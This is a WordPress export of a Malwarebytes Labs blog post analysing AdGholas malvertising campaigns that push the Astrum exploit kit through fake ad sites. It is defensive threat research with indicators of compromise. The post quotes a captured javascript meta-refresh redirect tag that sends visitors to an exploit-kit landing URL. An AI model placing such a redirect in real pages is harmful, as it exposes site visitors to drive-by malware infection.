{"id":8234,"date":"2017-07-05T09:10:21","date_gmt":"2017-07-05T17:10:21","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/07\/05\/news-2009\/"},"modified":"2017-07-05T09:10:21","modified_gmt":"2017-07-05T17:10:21","slug":"news-2009","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/07\/05\/news-2009\/","title":{"rendered":"AdGholas malvertising thrives in the shadows of ransomware outbreaks"},"content":{"rendered":"

Credit to Author: J\u00e9r\u00f4me Segura| Date: Wed, 05 Jul 2017 16:05:57 +0000<\/strong><\/p>\n

The latest\u00a0wave of ransomware<\/a>\u00a0following the WannaCry<\/a> outbreak\u00a0has kept everyone very busy and been the topic of many\u00a0conversations.\u00a0In the meantime, other\u00a0threat actors have been\u00a0quite active and perhaps even enjoyed\u00a0this complimentary diversion. This is certainly true for the most prolific malvertising gang of the moment, dubbed AdGholas<\/a>.<\/p>\n

Exposed a few times this year by ProofPoint<\/a> and TrendMicro<\/a>, AdGholas\u00a0is playing a whack-a-mole game with the ad industry to distribute malware onto unsuspecting users with the help of the Astrum exploit kit.<\/p>\n

A\u00a0master of\u00a0disguise, AdGholas has been flying right under the nose of several top ad networks while\u00a0benefiting from the ‘first to move’ effect. Indeed, the malvertising\u00a0operators are able to quickly roll out and activate a fake advertising\u00a0infrastructure for a few days before getting banned.<\/p>\n

On June 28<\/strong> (which is about ten days after it was last publicly reported<\/a>), we started seeing a new wave of drive-by download attacks distributed globally pushing the Astrum exploit kit. Sure enough, it was associated with\u00a0AdGholas activity via a decoy website. Behind the fake ad banners for ‘expert essays’ designed to trick ad agencies, laid code to exploit and infect users who simply happened to visit popular\u00a0websites.<\/p>\n

\"\"<\/a><\/p>\n

The fraudulent website expert-essays[.]com<\/em>, which was registered June 22,\u00a0is using a certificate from Let’s Encrypt, and is a replica from\u00a0essayoneday.com<\/em>. There are only a few minor visual differences\u00a0between the two, and a cursory review would reveal\u00a0the copycat. However, it is easier said than done in an industry dominated by automation and volume.<\/p>\n

\"\"<\/a><\/p>\n

After getting caught, AdGholas came back up again on July 1st<\/strong> and 2nd –\u00a0<\/strong>perhaps a long holiday week-end in the US may have seemed like the right timing –\u00a0via a new decoy site, jet-travels[.]com<\/em>, with the same modus operandi:<\/p>\n

\"\"<\/a><\/p>\n

From AdGholas to Astrum EK<\/h2>\n

We collected artifacts\u00a0that show us the redirection between the AdGholas group\u00a0and the Astrum exploit kit. This kind of redirect is highly conditional in order to evade the majority of ad scanners. While many malvertising actors do not care about cloaking, it is very important to others such as AdGholas because stealthiness\u00a0is\u00a0a strength that contributes to its longevity.<\/p>\n

The redirect tag hosted on expert-essays[.]com loads a landing page for\u00a0the Astrum exploit kit with:<\/p>\n

[“javascript:%27<meta http-equiv=refresh content=\\”0;url=”,”\\”>%27″,”https:\/\/comm.clamotten.com\/7pkzi\/-fb2j5s48sv4b\/nlo17hdt0cexguqnir\/kqh-xya-c6do32smjwh9mnc0″,”ae0a5bca85a8f0e1″]<\/em><\/p>\n

\"\"<\/a><\/p>\n

The group behind Astrum EK is also very sneaky, making good use of SSL, domain shadowing and other server side tricks that render\u00a0traffic collection and replay a challenge. In the current exploit kit landscape, domain shadowing has been slowed down and the popular RIG EK is mainly resorting (other than for a few exceptions) to IP addresses, in lieu of shadowed domains. As far as serving the content, plain HTTP is the norm, setting Astrum EK apart from the rest.<\/p>\n

For a long time banking Trojans were the payload of choice for Astrum EK. This seemed to fit in with the elusive and muffled nature of the exploit kit. However, according to ProofPoint<\/a>, new AdGholas\/Astrum infection chains have recently been dropping ransomware. Although it’s a change from\u00a0those threat actors’ style, cashing in on the ransomware frenzy makes sense.<\/p>\n

Containment and\u00a0protection<\/h2>\n

Malvertising continues to affect users on a large scale and is\u00a0a relied upon infection vector for threat actors. The recent and renewed activity from sophisticated groups like AdGholas is something to watch out for in a drive-by landscape dominated by malvertising-borne attacks more so than from compromised sites.<\/p>\n

Ad-blockers are one of several layers end users can rely on, but it is worth noting that even ad-blockers can be bypassed<\/a> and do not fix the most common underlying issue which is\u00a0outdated software. In other words, patching machines regularly immediately raises the difficulty level for an attacker to compromise your system. However, knowing that threat actors like AdGholas and Astrum EK are advanced and have employed zero-days, it is also important to use a signature-less and proactive defense to handle those cases.<\/p>\n

We’re happy to report that\u00a0Malwarebytes<\/a> users were protected against these malvertising campaigns already.<\/p>\n

Indicators of compromise (IOCs)<\/h2>\n

AdGholas:<\/p>\n

expert-essays[.]com  jet-travels[.]com  5.34.180.73  162.255.119.165<\/pre>\n
Astrum Exploit Kit:<\/p>\n
uniy[.]clamotten[.]com  comm[.]clamotten[.]com  comp[.]computer-tutor[.]info  lexy[.]computer-tutor[.]info  sior[.]ccnacertification[.]info  kvely[.]our-health[.]us  nuent[.]mughalplastic[.]com  mtive[.]linksaffpixel[.]com  cons[.]pathpixel[.]com  sumer[.]pathlinkaff[.]com  nsruc[.]ah7xb[.]com  ction[.]ah7xb[.]com  nstru[.]onlytechtalks[.]com  const[.]linksaffpixel[.]com  quely[.]onlytechtalks[.]com  coneq[.]modweave[.]com  94.156.174.11  SWF: 4ad7556a7ef85be260a8c10cfbc855234f0e9b8880db2be17ad0ad1d6e52909e<\/pre>\n
The post AdGholas malvertising thrives in the shadows of ransomware outbreaks<\/a> appeared first on Malwarebytes Labs<\/a>.<\/p>\n
https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Credit to Author: J\u00e9r\u00f4me Segura| Date: Wed, 05 Jul 2017 16:05:57 +0000<\/strong><\/p>\n\n\n\n
<\/a><\/td>\n<\/tr>\n
Several large malvertising campaigns went unnoticed amidst the news of the latest ransomware outbreak.<\/p>\n
Categories: <\/p>\n